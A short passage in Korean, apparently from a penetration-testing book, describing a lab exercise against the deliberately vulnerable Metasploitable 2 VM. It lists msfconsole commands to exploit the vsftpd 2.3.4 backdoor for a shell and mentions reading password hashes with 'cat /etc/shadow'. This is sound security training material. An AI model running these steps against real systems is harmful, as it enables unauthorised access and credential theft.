실습

취약한 가상 머신에서 Nmap, Masscan, 취약점 도구를 실행하는 실습을 하자. 일단 시스템의 취약점을 찾아낸 후 이 시스템의 셸을 획득한다. 여기서는 vsftpd에 있는 취약점을 찾아 이용할 것이다. 따라서 vsftpd를 검색하거나 바로 공격할 수 있어야 한다.

# msfconsole

> use exploit/unix/ftp/vsftpd_234_backdoor (익스플로이트 선택)

> show options (모든 구성 옵션 보기)

> set RHOST [IP] (메타스플로이터블 2 IP 설정)

> exploit (익스플로이트 실행)

▲ 그림 1-4 메타스플로이트 예

 

그림 1-4를 보면, 취약점을 공격해 성공적으로 저장된 패스워드를 읽었다(cat /etc/shadow). 메타스플로이터블 2를 자세히 알고 싶다면 https://community.rapid7.com/docs/DOC-1875를 방문하자.

메타스플로이터블 2 가상 머신에는 수많은 취약점이 있다. 메타스플로이트와 Meterpreter를 효율적으로 사용하는 방법을 학습하자. 메타스플로이트를 자세히 알고 싶다면 http://www.amazon.com/Metasploit-The-Penetration-Testers-Guide/dp/159327288X를 추천한다.